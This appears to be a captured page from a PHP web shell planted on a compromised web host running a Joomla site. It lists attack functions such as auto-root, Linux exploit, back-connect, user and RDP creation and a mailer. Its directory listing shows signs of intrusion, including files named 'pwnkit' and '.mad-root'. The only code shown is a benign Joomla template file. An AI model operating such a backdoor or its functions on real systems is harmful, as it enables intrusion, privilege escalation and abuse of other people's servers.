Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
templates /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
build_incomplete.html
17.32
KB
-rw----r--
component.php
694
B
-rw----r--
error.php
3.92
KB
-rw----r--
fatal-error.html
14.53
KB
-rw----r--
fatal.php
1.48
KB
-rw----r--
incompatible.html
5.77
KB
-rw----r--
index.php
14.29
KB
-rw----r--
offline.php
3.29
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : component.php
<?php /** * @package Joomla.Site * @subpackage Template.system * * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; /** @var Joomla\CMS\Document\HtmlDocument $this */ // Styles $this->getWebAssetManager()->registerAndUseStyle('template.system.general', 'templates/system/css/general.css'); ?> <!DOCTYPE html> <html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"> <head> <jdoc:include type="head" /> </head> <body class="contentpane"> <jdoc:include type="message" /> <jdoc:include type="component" /> </body> </html>
Close